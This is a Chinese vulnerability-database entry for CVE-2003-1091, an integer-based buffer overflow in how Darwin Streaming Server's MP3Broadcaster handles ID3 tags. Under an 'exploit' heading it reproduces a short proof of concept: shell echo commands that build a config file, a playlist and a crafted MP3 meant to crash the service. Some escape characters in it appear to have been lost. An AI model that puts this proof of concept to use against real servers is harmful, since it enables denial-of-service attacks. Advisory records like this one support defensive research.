Apple QuickTime/Darwin流MP3Broadcaster ID3标记处理漏洞

Apple QuickTime/Darwin流MP3Broadcaster ID3标记处理漏洞

漏洞ID 1107341 漏洞类型 边界条件错误
发布时间 2003-05-22 更新时间 2005-10-20
图片[1]-Apple QuickTime/Darwin流MP3Broadcaster ID3标记处理漏洞-安全小百科CVE编号 CVE-2003-1091
图片[2]-Apple QuickTime/Darwin流MP3Broadcaster ID3标记处理漏洞-安全小百科CNNVD-ID CNNVD-200312-258
漏洞平台 OSX CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22630
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-258
|漏洞详情
MP3Broadcaster是Darwin流服务程序包含的MP3广播程序。MP3Broadcaster不正确处理而已ID3标记,远程攻击者可以利用这个漏洞构建恶意MP3文件,触发基于整数的缓冲区溢出,可对服务程序进行拒绝服务攻击。DarwinStreamingServer(DSS)是流服务器技术可允许使用标准RTP和RTSP协议发送QuickTime数据给客户端,包含的MP3Broadcaster工具在处理ID3标记时没有正确检查边界,恶意的MP3文件可导致MP3Broadcaster发生段错误。
|漏洞EXP
source: http://www.securityfocus.com/bid/7660/info

MP3Broadcaster is shipped as part of Darwin Streaming Server software.

MP3Broadcaster has been reported prone to a vulnerability when processing malicious ID3 tags. This is likely due to insufficient sanity checks performed when handling signed integer values contained within MP3 file ID3 tags.

First create the sample configuration file:
$ echo -e "n" > test.conf

Then create a playlist file:
$ echo -e "*PLAY-LIST*nsong.mp3" > mp3playlist.ply

Create a specially crafted mp3 file:
$ echo -e
"ID3x03x00x00x00x00x0fx0fTPE1xffxaaxaaxbbx00x00x00x00x00x00

" > song.mp3
|参考资料

来源:US-CERTVulnerabilityNote:VU#148564
名称:VU#148564
链接:http://www.kb.cert.org/vuls/id/148564
来源:XF
名称:darwin-mp3broadcaster-code-execution(12054)
链接:http://xforce.iss.net/xforce/xfdb/12054
来源:BID
名称:7660
链接:http://www.securityfocus.com/bid/7660
来源:SECTRACK
名称:1006822
链接:http://securitytracker.com/id?1006822
来源:BUGTRAQ
名称:20030522QuickTime/DarwinStreamingServersecurityissues
链接:http://archives.neohapsis.com/archives/bugtraq/2003-05/0245.html
来源:NSFOCUS
名称:4873
链接:http://www.nsfocus.net/vulndb/4873

相关推荐: Microsoft Internet Explorer强制脚本执行漏洞

Microsoft Internet Explorer强制脚本执行漏洞 漏洞ID 1204649 漏洞类型 设计错误 发布时间 2002-03-08 更新时间 2005-05-02 CVE编号 CVE-2002-0026 CNNVD-ID CNNVD-2002…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享